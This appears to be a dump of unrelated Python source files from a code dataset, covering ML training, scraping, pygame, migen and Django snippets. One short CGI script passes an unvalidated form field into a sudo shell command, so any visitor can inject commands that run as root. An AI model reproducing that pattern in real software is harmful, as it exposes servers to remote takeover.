groceryList = ['Orange','Apple','Tomato','Orange','Tomato','Cucumber','Tomato','Tomato','Tomato',
'Apple','Cucumber','Apple','Tomato','Tomato','Apple','Tomato','Orange','Apple',
'Orange','Apple','Apple','Orange','Apple','Apple']
scanner.scanItems(groceryList)
self.assertTrue(self.multipleDiscountsItemList['Apple'].finalCost() == Decimal('3.80'))
self.assertTrue(self.multipleDiscountsItemList['Tomato'].finalCost() == Decimal('4.37'))
self.assertTrue(self.multipleDiscountsItemList['Orange'].finalCost() == Decimal('0.80'))
self.assertTrue(self.multipleDiscountsItemList['Cucumber'].finalCost() == Decimal('0.20'))
self.assertEqual(Decimal("9.17"),scanner.totalPrice())
def testPricingMultipleItemsWithMultipleDiscountsOneExact(self):
scanner = Scanner(self.multipleDiscountsItemList)
groceryList = ['Orange','Apple','Tomato','Orange','Tomato','Cucumber','Tomato','Tomato','Tomato',
'Apple','Cucumber','Apple','Tomato','Tomato','Apple','Tomato','Orange','Apple',
'Orange','Apple','Apple','Orange','Apple','Apple','Tomato','Tomato']
scanner.scanItems(groceryList)
self.assertTrue(self.multipleDiscountsItemList['Apple'].finalCost() == Decimal('3.80'))
self.assertTrue(self.multipleDiscountsItemList['Tomato'].finalCost() == Decimal('2.00'))
self.assertTrue(self.multipleDiscountsItemList['Orange'].finalCost() == Decimal('0.80'))
self.assertTrue(self.multipleDiscountsItemList['Cucumber'].finalCost() == Decimal('0.20'))
self.assertEqual(Decimal("6.80"),scanner.totalPrice())
class CheckoutTests(unittest.TestCase):
def setUp(self):
pricingRulesWithSingleDiscount = { 'Apple': { 1 : '0.50' , 3 : '1.30' },
'Orange': {1 : '0.20'},
'Tomato': {1 : '1.25'},
'Cucumber': {1 : '0.10'}
}
self.itemList = createInventoryList(pricingRulesWithSingleDiscount)
def testCheckout(self):
scanner = Scanner(self.itemList)
groceryList = ['Apple','Orange','Tomato', 'Apple', 'Orange','Cucumber']
scanner.scanItems(groceryList)
self.failIf(self.itemList['Apple'].numberOfItems != 2)
self.failIf(self.itemList['Orange'].numberOfItems != 2)
self.failIf(self.itemList['Tomato'].numberOfItems != 1)
self.failIf(self.itemList['Cucumber'].numberOfItems != 1)
|
6,317 | 23f0ba622097eb4065337ea77ea8104a610d6857 | import os
import sys
sys.path.append("..")
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.metrics import accuracy_score
import config
from mikasa.common import timer
from mikasa.io import load_pickle, dump_pickle, load_feature
from mikasa.trainer.gbdt import LGBMTrainer
from mikasa.trainer.base import SklearnRegressionTrainer
from mikasa.trainer.cross_validation import RSACVTrainer
from mikasa.ensemble import SimpleAgerageEnsember
from mikasa.plot import plot_importance
from mikasa.mlflow_writer import MlflowWriter
def run_train(model_name, base_trainer, X, y):
cv = StratifiedKFold(n_splits=3, shuffle=True, random_state=config.SEED)
trainer = RSACVTrainer(cv, base_trainer)
trainer.fit(X=X, y=y, random_state=config.SEED, num_seed=config.NUM_SEED)
# Save model.
models = trainer.get_model()
dump_pickle(models, f"../data/titanic/model/{model_name}_models.pkl")
# Evaluation by cv.
oof = np.where(trainer.get_cv_oof() > 0.5, 1, 0)
target = trainer.get_cv_targets()
metric = accuracy_score(target, oof)
return trainer, metric
def eval_single_model(trainer, data, target):
pred = np.array(trainer.predict(data)).T
ensembler = SimpleAgerageEnsember()
pred_avg = ensembler.predict(pred)
pred_avg = np.where(pred_avg > 0.5, 1, 0)
score = accuracy_score(target, pred_avg)
return score
def save_importance(model_name, trainer):
name, mean_importance, std_importance = trainer.get_importance()
fig = plot_importance(name, mean_importance, std_importance)
fig.savefig(f"../data/titanic/working/{model_name}_importance.png")
def main():
# Load data.
src_dir = "../data/titanic/feature/"
feature_files = config.FeatureList.features
feature_files = [
os.path.join(src_dir, f"{filename}.pkl") for filename in feature_files
]
X = load_feature(feature_files)
y = load_pickle(os.path.join(src_dir, "target.pkl"))
print(X.head())
print(y.head())
# Split data
X_train, X_eval, y_train, y_eval = train_test_split(
X, y, test_size=0.2, random_state=config.SEED, stratify=y
)
cv_metrics = {}
eval_metrics = {}
# Train model.
base_trainers = {
"LGBM": LGBMTrainer(
config.LightgbmParams.params, config.LightgbmParams.train_params
),
}
fit_trainers = {}
for model_name, base_trainer in base_trainers.items():
trainer, metric = run_train(model_name, base_trainer, X_train, y_train)
fit_trainers[model_name] = trainer
cv_metrics[model_name] = metric
eval_metrics[model_name] = eval_single_model(trainer, X_eval, y_eval)
save_importance(model_name, trainer)
# Stacking
pred_first = []
for model_name, _trainer in fit_trainers.items():
pred_first.append(np.array(_trainer.predict(X_eval)).T)
pred_first = np.concatenate(pred_first, axis=1)
pred_first = pd.DataFrame(pred_first)
base_trainer = SklearnRegressionTrainer(model=Ridge(random_state=config.SEED))
trainer, metric = run_train("stack_ridge", base_trainer, pred_first, y_eval)
eval_metrics["Stack"] = metric
# Evaluation
for model_name, metric in cv_metrics.items():
print(f"{model_name:>8} CV Metric: {metric:.08f}")
for model_name, metric in eval_metrics.items():
print(f"{model_name:>8} Eval Metric: {metric:.08f}")
# Domp logs to mlflow.
if config.DEBUG is not True:
writer = MlflowWriter(
config.MLflowConfig.experiment_name,
tracking_uri=os.path.abspath("../mlruns"),
)
writer.set_run_name(config.MLflowConfig.run_name)
writer.set_note_content(config.MLflowConfig.experiment_note)
# Features
writer.log_param("Feature", ", ".join(config.FeatureList.features))
# Paraeters
writer.log_param("SEED", config.SEED)
writer.log_param("NUM_SEED", config.NUM_SEED)
writer.log_param(
"LGBM_params",
{
"params": config.LightgbmParams.params,
"train_params": config.LightgbmParams.train_params,
},
)
# Metric
for model_name, _metric in cv_metrics.items():
writer.log_metric(f"{model_name} CV Metric", _metric)
for model_name, _metric in eval_metrics.items():
writer.log_metric(f"{model_name} Eval Metric", _metric)
# Close writer client.
writer.set_terminated()
if __name__ == "__main__":
with timer("Train Processing"):
main()
|
6,318 | 080aa8b99cdded7a947880a1c3399f68b28ae44d | """
Sprites - animations for objects.
"""
import config
import os
import pygame
class Sheet(object):
""" An single large image composed of smaller images used for sprite
animations. All the sprites on the sheet must be the same size. The width x
height give the sprite dimensions in pixels. The rows x columns give the
sheet dimensions in images. """
def __init__(self, width, height, rows, columns, filename):
self.rows = rows
self.columns = columns
self.width = width
self.height = height
path = os.path.join(config.SPRITE_DIRECTORY, filename)
self.surface = pygame.image.load(path)
self.surface.convert_alpha()
def get_image(self, index):
x = (index % self.columns) * self.width
y = (index / self.columns) * self.height
rect = pygame.Rect(x, y, self.width, self.height)
return self.surface.subsurface(rect)
class Sprite(object):
""" Abstract base class for all sprites. """
def __init__(self, sheet):
self.sheet = sheet
@property
def height(self):
""" The height in pixels. """
return self.sheet.height
@property
def width(self):
""" The width in pixels. """
return self.sheet.width
class CompositeSprite(Sprite):
""" A sprite that is composed of multiples sprites layered on top of each
other. The first sprite goes on the bottom, the next above that, and so
on. The sprites should all be the same size (the first sprite sets the
size; they will all be anchored to the top left corner)."""
def __init__(self, sprites):
super(CompositeSprite, self).__init__(sprites[0].sheet)
self.sprites = sprites
self.surface = pygame.Surface((self.width, self.height))
self.surface.convert_alpha()
def get_image(self, frame):
""" Return the layered image for the given animation frame number. """
self.surface.fill((0, 0, 0, 0))
for sprite in self.sprites:
self.surface.blit(sprite.get_image(frame), (0, 0))
return self.surface
class AnimatedSprite(Sprite):
""" The animation for an object. Each sprite refers to a sheet, a starting
image and a number of sequential animation images. The facings bitmask
indicates the number and type of facings which the sprite supports. The
sprite's frames attribute is the image sequence."""
# XXX: facings not handled yet
def __init__(self, sheet, num_frames, start_frame, facings=0):
super(AnimatedSprite, self).__init__(sheet)
self.num_frames = num_frames
self.facings = facings
self.frames = []
for frame in range(num_frames):
index = start_frame + frame
self.frames.append(sheet.get_image(index))
def get_image(self, frame):
""" Return the image for the given animation frame number. """
msec = frame * config.MS_PER_FRAME
frame = msec // 250
return self.frames[frame % self.num_frames]
class WaveSprite(Sprite):
""" A sprite with a single frame that animates by "rolling". """
def __init__(self, sheet, frame):
super(WaveSprite, self).__init__(sheet)
self.num_frames = self.height
# pygame's surface scroll *almost* does what I want, but it doesn't
# wrap. So I double the image and scroll up the double.
self.double = pygame.Surface((self.width, self.height * 2))
self.double.convert_alpha()
image = sheet.get_image(frame)
self.double.blit(image, (0, 0))
self.double.blit(image, (0, self.height))
def get_image(self, frame):
""" Return the image for the given animation frame number. """
rect = pygame.Rect(0, 0, self.width, self.height)
msec = frame * config.MS_PER_FRAME
frame = msec // 100
rect.y = self.height - (frame % self.height)
return self.double.subsurface(rect)
class Fade(object):
""" A shaded semi-transparent surface. """
def __init__(self, width, height):
self.surf = pygame.Surface((width, height), flags=pygame.SRCALPHA)
self.surf.convert_alpha()
self.surf.fill(pygame.Color(0, 0, 0, 128))
|
6,319 | cd1d8a73b6958775a212d80b50de74f4b4de18bf | import requests
from lxml import etree
from pymongo import MongoClient
from lib.rabbitmq import Rabbit
from lib.log import LogHandler
from lib.proxy_iterator import Proxies
import yaml
import json
import datetime
import re
import time
setting = yaml.load(open('config_local.yaml'))
log = LogHandler('article_consumer')
m = MongoClient(setting['mongo_config']['config_host'], setting['mongo_config']['port'])
m.admin.authenticate(setting['mongo_config']['user_name'],setting['mongo_config']['password'] )
collection = m[setting['mongo_config']['config_db']][setting['mongo_config']['coll_detail']]
clean_coll = m[setting['mongo_config']['config_db']][setting['mongo_config']['clean']]
rabbit = Rabbit(setting['rabbitmq_host'],setting['rabbitmq_port'])
connection = rabbit.connection
class CrawlerDetail:
def __init__(self):
self.proxy = Proxies()
def start_consume(self):
channel = connection.channel()
channel.queue_declare(queue='usual_article')
channel.basic_qos(prefetch_count=1)
channel.basic_consume(self.consume_article_detail_url,
queue='usual_article',
no_ack=False)
channel.start_consuming()
def clean(self,message):
"""
作者,发布时间,详细来源字段清洗
:param message:
:return:
"""
clean = clean_coll.find_one({'source': message['source']})
if clean['post_time'] is not None:
try:
post_time = re.search(clean['post_time'],message['post_time'],re.S|re.M).group(1)
message['post_time'] = post_time
except:
log.info("post_time清洗失败{}".format(message['post_time']))
message['post_time'] = None
if clean['author'] is not None:
try:
author = re.search(clean['author'],message['author']).group(1)
message['author'] = author
except:
log.info("author清洗失败{}".format(message['author']))
message['author'] = None
if clean['source_detail'] is not None:
try:
source_detail = re.search(clean['source_detail'],message['source_detail'],re.S|re.M).group(1)
message['source_detail'] = source_detail
except:
log.info("source_detail清洗失败{}".format(message['source_detail']))
message['source_detail'] = None
return message
def consume_article_detail_url(self,ch, method, properties, body):
"""
文章详情页解析
:param ch:
:param method:
:param properties:
:param body: json格式字符串
:return:
"""
message = json.loads(body.decode())
for i in range(10):
try:
html = requests.get(message['detail_url'],timeout=10,proxies=next(self.proxy))
connection.process_data_events()
if html.status_code == 200:
break
except Exception as e:
connection.process_data_events()
if i == 10:
log.error("请求文章详情页{}失败".format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
try:
con = html.content.decode()
except:
try:
con = html.content.decode('gbk')
except:
log.error('{}utf-8,gbk编码解析失败'.format(message['detail_url']))
ch.basic_ack(delivery_tag=method.delivery_tag)
return
page = etree.HTML(con)
# 获取详情页的解析方式
detail_config_dict = collection.find_one({'source': message['source']})
if detail_config_dict['body'] is not None:
try:
for pattern in detail_config_dict['body']:
if page.xpath(pattern):
article_body = page.xpath(pattern)[0]
message['body'] = etree.tounicode(article_body)
break
except:
log.error('xpath语句未能解析body')
ch.basic_ack(delivery_tag=method.delivery_tag)
return
if detail_config_dict['comment_count'] is not None:
message['comment_count'] = page.xpath(detail_config_dict['comment_count'])[0]
if detail_config_dict['like_count'] is not None:
message['like_count'] = page.xpath(detail_config_dict['like_count'])[0]
if detail_config_dict['read_num'] is not None:
message['read_num'] = page.xpath(detail_config_dict['read_num'])[0]
if detail_config_dict['author'] is not None:
try:
message['author'] = page.xpath(detail_config_dict['author'])[0]
except:
log.info("没有提取到{}作者字段".format(message['detail_url']))
if detail_config_dict['post_time'] is not None:
try:
message['post_time'] = page.xpath(detail_config_dict['post_time'])[0]
except:
log.info("没有提取到{}文章发表时间".format(message['detail_url']))
if detail_config_dict['tag'] is not None:
message['tag'] = page.xpath(detail_config_dict['tag'])[0]
if detail_config_dict['source_detail'] is not None:
try:
message['source_detail'] = page.xpath(detail_config_dict['source_detail'])[0]
except:
log.info("没有提取到{}文章详细来源".format(message['detail_url']))
self.clean(message)
# 放入消息队列做正文替换清洗
produce_channel = connection.channel()
produce_channel.queue_declare('article_body')
article_text = json.dumps(message)
produce_channel.basic_publish(exchange='',
routing_key='article_body',
body=article_text)
log.info('{}已经放入清洗队列'.format(message['title']))
ch.basic_ack(delivery_tag=method.delivery_tag)
produce_channel.close() |
6,320 | f3eed00a58491f36778b3a710d2f46be093d6eda | from migen import *
from migen.fhdl import verilog
class Alignment_Corrector(Module):
def __init__(self):
self.din=din=Signal(32)
self.aligned=aligned=Signal()
self.dout=dout=Signal(32)
self.correction_done=Signal()
# # #
first_half=Signal(16)
first_half1=Signal(16)
second_half=Signal(16)
self.submodules.fsm=FSM(reset_state="IDLE")
self.fsm.act("IDLE",
If(aligned,
NextState("INIT"),
)
)
self.fsm.act("INIT",
NextState("DONE"),
NextValue(first_half,din[16:]),
NextValue(self.correction_done,1)
)
self.fsm.act("DONE",
dout.eq(Cat(first_half,din[:16])),
NextValue(first_half,din[16:]),
NextState("DONE")
)
#example = Alignment_Corrector()
#verilog.convert(example, {example.din, example.dout, example.aligned, example.correction_done}).write("alignment_corrector.v")
"""
def tb(dut):
yield
for i in range(10):
yield dut.din.eq(0x62cfa9d274)
yield dut.aligned.eq(1)
yield
yield dut.din.eq(0x9d30562d8b)
yield
dut=Alignment_Corrector()
run_simulation(dut,tb(dut),vcd_name="alignment_tb.vcd")
"""
|
6,321 | 45f0a7a78184195a593061d863ff2114abe01a46 | """
ConstantsCommands.py
"""
TEST_HEAD = "\n >>>>>> " \
"\n >>>>>> Test in progress: {0}" \
"\n >>>>>>"
TEST_TAIL = ">>>>>> Test execution done, tearDown\n\r"
|
6,322 | 516d9790f40c021d45302948b7fba0cf3e00da0a | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 15 10:28:04 2020
@author: Maxi
"""
import numpy as np
from ase.io import read
from RDF_3D import pairCorrelationFunction_3D
import matplotlib.pyplot as plt
filename = r"C:\Users\Maxi\Desktop\t\Ag_HfO2_cat_3.125_222_t.cif"
crystal = read(filename)
corrdinates = crystal.get_positions()
cell_length = crystal.get_cell_lengths_and_angles()
cell_length = cell_length[0:3] # only select the cell length
dr = 0.01 # shperical shell radius dr
min_length_cell = min(cell_length) # select the smalles length in cell
rmax = min_length_cell / 10
x = corrdinates[:, 0] # split the 2d array into x, y, z coordinates
y = corrdinates[:, 1]
z = corrdinates[:, 2]
g_r, r, ref_ind = pairCorrelationFunction_3D(x, y, z, min_length_cell, rmax, dr)
plt.figure()
plt.plot(r, g_r, color='black')
plt.xlabel('r')
plt.ylabel('g(r)')
plt.xlim( (0, rmax) )
plt.ylim( (0, 1.05 * g_r.max()) )
plt.show()
|
6,323 | ccf9c389a65d1420e87deec2100e37bccdcb5539 | #encoding:utf-8
from flask import Flask
import config
from flask_rabbitmq import Queue, RabbitMQ
app = Flask(__name__)
app.config.from_object(config)
queue = Queue()
mq = RabbitMQ(app, queue)
from app import demo
|
6,324 | 59376f6565cd72e20087609253a41c04c6327a27 | # encoding:UTF-8
# 题目:斐波那契数列。
def fib(n):
if n==1 or n==2:
return 1
return fib(n-1)+fib(n-2)
print (fib(10))
|
6,325 | 5723e7889663142832a8131bb5f4c35d29692a49 | from . import *
from rest_framework import permissions
from core.serializers import CategorySerializer
from core.models.category_model import Category
class CategoryViewSet(viewsets.ModelViewSet):
serializer_class = CategorySerializer
queryset = Category.objects.all()
def get_permissions(self):
permission_classes = (permissions.AllowAny,)
return [permission() for permission in permission_classes]
|
6,326 | 7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8 |
#! /usr/bin/env python
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
6,327 | d9156e240d49e0a6570a5bc2315f95a7a670fd4f |
#####
# Created on Oct 15 13:13:11 2019
#
# @author: inesverissimo
#
# Do pRF fit on median run, make iterative fit and save outputs
####
import os
# issue with tensorflow, try this suggestion
#NUM_PARALLEL_EXEC_UNITS = 16
#os.environ['OMP_NUM_THREADS'] = str(NUM_PARALLEL_EXEC_UNITS)
#os.environ["KMP_AFFINITY"] = "granularity=fine,verbose,compact,1,0"
##
import json
import sys
import glob
import re
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import scipy as sp
import scipy.stats as stats
import nibabel as nb
from nilearn.image import mean_img
from nilearn import surface
from utils import * # import script to use relevante functions
# requires pfpy be installed - preferably with python setup.py develop
from prfpy.rf import *
from prfpy.timecourse import *
from prfpy.stimulus import PRFStimulus2D
from prfpy.grid import Iso2DGaussianGridder
from prfpy.fit import Iso2DGaussianFitter
from popeye import utilities
# define participant number and open json parameter file
if len(sys.argv) < 2:
raise NameError('Please add subject number (ex:1) '
'as 1st argument in the command line!')
elif len(sys.argv) < 3:
raise NameError('Please select server being used (ex: aeneas or cartesius) '
'as 2nd argument in the command line!')
else:
# fill subject number with 0 in case user forgets
sj = str(sys.argv[1]).zfill(2)
json_dir = '/home/inesv/SB-ref/scripts/analysis_params.json' if str(
sys.argv[2]) == 'cartesius' else 'analysis_params.json'
with open(json_dir, 'r') as json_file:
analysis_params = json.load(json_file)
# use smoothed data?
with_smooth = analysis_params['with_smooth']
# define paths and list of files
if str(sys.argv[2]) == 'cartesius':
filepath = glob.glob(os.path.join(
analysis_params['post_fmriprep_outdir_cartesius'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
print('functional files from %s' % os.path.split(filepath[0])[0])
out_dir = os.path.join(analysis_params['pRF_outdir_cartesius'],'shift_crop')
elif str(sys.argv[2]) == 'aeneas':
print(os.path.join(
analysis_params['post_fmriprep_outdir'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
filepath = glob.glob(os.path.join(
analysis_params['post_fmriprep_outdir'], 'prf', 'sub-{sj}'.format(sj=sj), '*'))
print('functional files from %s' % os.path.split(filepath[0])[0])
out_dir = os.path.join(analysis_params['pRF_outdir'],'shift_crop')
# changes depending on data used
if with_smooth == 'True':
# last part of filename to use
file_extension = 'cropped_sg_psc_smooth%d.func.gii' % analysis_params['smooth_fwhm']
# compute median run, per hemifield
median_path = os.path.join(
out_dir, 'sub-{sj}'.format(sj=sj), 'run-median', 'smooth%d' % analysis_params['smooth_fwhm'],'iterative_fit')
else:
# last part of filename to use
file_extension = 'cropped_sg_psc.func.gii'
# compute median run, per hemifield
median_path = os.path.join(out_dir, 'sub-{sj}'.format(sj=sj), 'run-median','iterative_fit')
# list of functional files
filename = [run for run in filepath if 'prf' in run and 'fsaverage' in run and run.endswith(
file_extension)]
filename.sort()
if not os.path.exists(median_path): # check if path to save median run exist
os.makedirs(median_path)
med_gii = []
for field in ['hemi-L', 'hemi-R']:
hemi = [h for h in filename if field in h]
# set name for median run (now numpy array)
med_file = os.path.join(median_path, re.sub(
'run-\d{2}_', 'run-median_', os.path.split(hemi[0])[-1]))
# if file doesn't exist
if not os.path.exists(med_file):
med_gii.append(median_gii(hemi, median_path)) # create it
print('computed %s' % (med_gii))
else:
med_gii.append(med_file)
print('median file %s already exists, skipping' % (med_gii))
# create/load design matrix
png_path = '/home/inesv/SB-ref/scripts/imgs/' if str(
sys.argv[2]) == 'cartesius' else analysis_params['imgs_dir']
png_filename = [os.path.join(png_path, png) for png in os.listdir(png_path)]
png_filename.sort()
dm_filename = os.path.join(os.getcwd(), 'prf_dm_square.npy')
#if not os.path.exists(dm_filename): # if not exists
screenshot2DM(png_filename, 0.1,
analysis_params['screenRes'], dm_filename,dm_shape = 'square') # create it
print('computed %s' % (dm_filename))
#else:
# print('loading %s' % dm_filename)
prf_dm = np.load(dm_filename)
prf_dm = prf_dm.T # then it'll be (x, y, t)
# change DM to see if fit is better like that
# do new one which is average of every 2 TRs
prf_dm = shift_DM(prf_dm)
prf_dm = prf_dm[:,:,analysis_params['crop_pRF_TR']:] # crop DM because functional data also cropped now
# define model params
fit_model = analysis_params["fit_model"]
TR = analysis_params["TR"]
hrf = utilities.spm_hrf(0,TR)
# make stimulus object, which takes an input design matrix and sets up its real-world dimensions
prf_stim = PRFStimulus2D(screen_size_cm=analysis_params["screen_width"],
screen_distance_cm=analysis_params["screen_distance"],
design_matrix=prf_dm,
TR=TR)
# sets up stimulus and hrf for this gridder
gg = Iso2DGaussianGridder(stimulus=prf_stim,
hrf=hrf,
filter_predictions=False,
window_length=analysis_params["sg_filt_window_length"],
polyorder=analysis_params["sg_filt_polyorder"],
highpass=False,
add_mean=False)
# set grid parameters
grid_nr = analysis_params["grid_steps"]
sizes = analysis_params["max_size"] * np.linspace(np.sqrt(analysis_params["min_size"]/analysis_params["max_size"]),1,grid_nr)**2
eccs = analysis_params["max_eccen"] * np.linspace(np.sqrt(analysis_params["min_eccen"]/analysis_params["max_eccen"]),1,grid_nr)**2
polars = np.linspace(0, 2*np.pi, grid_nr)
for gii_file in med_gii:
print('loading data from %s' % gii_file)
data = np.array(surface.load_surf_data(gii_file))
print('data array with shape %s'%str(data.shape))
gf = Iso2DGaussianFitter(data=data, gridder=gg, n_jobs=16, fit_css=False)
#filename for the numpy array with the estimates of the grid fit
grid_estimates_filename = gii_file.replace('.func.gii', '_estimates.npz')
if not os.path.isfile(grid_estimates_filename): # if estimates file doesn't exist
print('%s not found, fitting grid'%grid_estimates_filename)
# do grid fit and save estimates
gf.grid_fit(ecc_grid=eccs,
polar_grid=polars,
size_grid=sizes)
np.savez(grid_estimates_filename,
x = gf.gridsearch_params[..., 0],
y = gf.gridsearch_params[..., 1],
size = gf.gridsearch_params[..., 2],
betas = gf.gridsearch_params[...,3],
baseline = gf.gridsearch_params[..., 4],
ns = gf.gridsearch_params[..., 5],
r2 = gf.gridsearch_params[..., 6])
loaded_gf_pars = np.load(grid_estimates_filename)
gf.gridsearch_params = np.array([loaded_gf_pars[par] for par in ['x', 'y', 'size', 'betas', 'baseline','ns','r2']])
gf.gridsearch_params = np.transpose(gf.gridsearch_params)
# do iterative fit
iterative_out = gii_file.replace('.func.gii', '_iterative_output.npz')
if not os.path.isfile(iterative_out): # if estimates file doesn't exist
print('doing iterative fit')
gf.iterative_fit(rsq_threshold=0.1, verbose=False)
np.savez(iterative_out,
it_output=gf.iterative_search_params)
else:
print('%s already exists'%iterative_out)
## do iterative fit again, now with css, n=1 (isn't that just gaussian?)
#print('doing iterative fit with css ')
#gf.fit_css = True
#gf.iterative_fit(rsq_threshold=0.1, verbose=False)
#iterative_css_out = gii_file.replace('.func.gii', '_iterative_css_output.npz')
#np.savez(iterative_css_out,
# it_output=gf.iterative_search_params)
|
6,328 | 77ea670b537e9ff7082aeb9ed54b011fa8e3a035 | from django.contrib import admin
from employees.models import Leave,EmployeeProfile
admin.site.register(Leave)
admin.site.register(EmployeeProfile)
# Register your models here.
|
6,329 | 6b2a9e8c6e95f52e9ebf999b81f9170fc669cce4 | import os
import time
import requests
from dotenv import load_dotenv
from twilio.rest import Client
load_dotenv()
BASE_URL = 'https://api.vk.com/method/users.get'
def get_status(user_id):
params = {
'user_ids': user_id,
'V': os.getenv('API_V'),
'access_token': os.getenv('ACCESS_TOKEN'),
'fields': 'online'
}
friends_status = requests.post(BASE_URL, params=params)
return friends_status.json()['response'][0]['online']
def send_sms(sms_text):
account_sid = os.getenv('TWILIO_ACCOUNT_SID')
auth_token = os.getenv('TWILIO_AUTH_TOKEN')
client = Client(account_sid, auth_token)
message = client.messages.create(
body='Joing the dark side',
from_=os.getenv('NUMBER_FROM'),
media_url=['https://demo.twilio.com/owl.png'],
to=os.getenv('NUMBER_TO')
)
return message.sid
if __name__ == '__main__':
vk_id = input('Введите id ')
while True:
if get_status(vk_id) == 1:
send_sms(f'{vk_id} сейчас онлайн!')
break
time.sleep(5)
|
6,330 | 1d2dae7f1d937bdd9a6044b23f8f1897e61dac23 | #!/usr/bin/python3
print("content-type: text/html")
print()
import subprocess
import cgi
form=cgi.FieldStorage()
osname=form.getvalue("x")
command="sudo docker stop {}".format(osname)
output=subprocess.getstatusoutput(command)
status=output[0]
info=output[1]
if status==0:
print("{} OS is stopped succesfully....".format(osname))
else:
print("some error: {}".format(info))
|
6,331 | be9179b33991ba743e6e6b7d5dd4dc85ffc09fc3 | """
util - other functions
"""
import torch
import numpy as np
from common_labelme import Config
from torch.autograd import Variable
I = torch.FloatTensor(np.eye(Config.batch_size),)
E = torch.FloatTensor(np.ones((Config.batch_size, Config.batch_size)))
normalize_1 = Config.batch_size
normalize_2 = Config.batch_size * Config.batch_size - Config.batch_size
def mig_loss_function(output1, output2, p):
new_output = output1 / p
m = (new_output @ output2.transpose(1,0))
noise = torch.rand(1)*0.0001
m1 = torch.log(m*I+ I*noise + E - I)
m2 = m*(E-I)
return -(sum(sum(m1)) + Config.batch_size)/normalize_1 + sum(sum(m2)) / normalize_2
def tvd_loss_function(output1, output2, p):
new_output = output1 / p
m = (new_output @ output2.transpose(1,0))
noise = torch.rand(1)*0.0001
m1 = torch.log(m*I + I * noise + E - I)
m2 = torch.log(m*(E-I) + I )
return -(sum(sum(torch.sign(m1))))/normalize_1 + sum(sum(torch.sign(m2))) / normalize_2
def pearson_loss_function(output1, output2, p):
new_output = output1 / p
m = (new_output @ output2.transpose(1,0))
m1 = m*I
m2 = m*(E-I)
m2 = m2*m2
return -(2 * sum(sum(m1)) - 2 * Config.batch_size) / normalize_1 + (sum(sum(m2)) - normalize_2) / normalize_2
def reverse_kl_loss_function(output1, output2, p):
new_output = output1 / p
m = (new_output @ output2.transpose(1,0))
m1 = m*I
m1 = -I/(m1.float() + E - I)
m2 = torch.log(m*(E-I) + I)
return -(sum(sum(m1)))/normalize_1 + (-sum(sum(m2)) - normalize_2) / normalize_2
def sh_loss_function(output1, output2, p):
new_output = output1 / p
m = (new_output @ output2.transpose(1,0))
m1 = m*I
m1 = torch.sqrt(I/(m1.float() + E - I))
m2 = torch.sqrt(m*(E-I))
return -(-sum(sum(m1)) + Config.batch_size)/normalize_1 + sum(sum(m2)) / normalize_2
def entropy_loss(outputs):
num = outputs.size()[0]
temp = -outputs * torch.log(outputs+0.0001)
loss = torch.sum(temp)
loss /= num
return loss
def M_step(expert_label,mu):
#---------------------------------------------------------------#
# #
# expert_label size : batch_size * expert_num #
# mu : batch_size * num_classes #
# expert_parameters = expert_num * num_classes * num_classes #
# #
#---------------------------------------------------------------#
if not Config.missing:
normalize = torch.sum(mu, 0).float()
expert_label = expert_label.long()
expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
for i in range(mu.size()[0]):
for R in range(Config.expert_num):
expert_parameters[R, :, expert_label[i, R]] += mu[i].float()
expert_parameters = expert_parameters / normalize.unsqueeze(1)
else:
normalize = torch.zeros(Config.expert_num,Config.num_classes)
expert_label = expert_label.long()
expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
for i in range(mu.size()[0]):
for R in range(Config.expert_num):
if expert_label[i,R] < 0:
continue
expert_parameters[R, :, expert_label[i, R]] += mu[i].float()
normalize[R] += mu[i].float()
normalize = normalize + 1 * (normalize == 0).float()
for R in range(Config.expert_num):
expert_parameters[R] = expert_parameters[R] / normalize[R].unsqueeze(1)
expert_parameters = expert_parameters.cuda()
return expert_parameters
def M_step_p_mbem(t):
p = torch.zeros(Config.num_classes)
t = t.long()
for i in range(t.size(0)):
p[t[i]] += 1
p /= t.size()[0]
return p
def M_step_mbem(expert_label,t):
#---------------------------------------------------------------#
# #
# expert_label size : batch_size * expert_num #
# t : batch_size #
# expert_parameters = expert_num * num_classes * num_classes #
# #
#---------------------------------------------------------------#
normalize = torch.zeros(Config.expert_num, Config.num_classes)
expert_label = expert_label.long()
t = t.long()
expert_parameters = torch.zeros((Config.expert_num, Config.num_classes, Config.num_classes))
for i in range(t.size()[0]):
for R in range(Config.expert_num):
if expert_label[i, R] < 0:
continue
expert_parameters[R, t[i], expert_label[i, R]] += 1
normalize[R,t[i]] += 1
normalize = normalize + 1 * (normalize == 0).float()
for R in range(Config.expert_num):
expert_parameters[R] = expert_parameters[R] / normalize[R].unsqueeze(1)
expert_parameters = expert_parameters.cuda()
return expert_parameters
def print_recons_result(right_model, confusion_matrix):
confusion_loss = 0
for i in range(1,len(list(right_model.parameters()))):
para = list(right_model.parameters())[i].detach().cpu()
#print("Expert %d" %i)
local_confusion_matrix = torch.nn.functional.softmax(para, dim=1)
#print(local_confusion_matrix)
residual_matrix = local_confusion_matrix - confusion_matrix[i-1, :, :]
residual = torch.sum(abs(residual_matrix))
confusion_loss += residual
print("Total variation:", confusion_loss.item())
def initial_priori(train_loader):
p = torch.zeros((Config.num_classes))
total = 0
for batch_idx, (left_data, right_data, label) in enumerate(train_loader):
linear_sum = torch.sum(right_data, dim=1)
_, majority = torch.max(linear_sum, 1)
majority = Variable(majority).long()
total += label.size()[0]
for i in range(Config.num_classes):
p[i] += torch.sum(majority == i).float()
p = p/float(total)
return p
def update_priori(model, train_loader):
# waiting for solution
p = torch.zeros((Config.num_classes))
# updating priori by posteri
total = 0
for batch_idx, (left_data, right_data, label) in enumerate(train_loader):
ep = Variable(right_data).float().cuda()
images = Variable(left_data).float().cuda()
outputs = model(images)
_, predicts = torch.max(outputs.data, 1)
total += ep.size()[0]
predicts = predicts.detach().cpu()
for i in range(Config.num_classes):
p[i] += torch.sum(predicts == i).float()
p = p/float(total)
'''
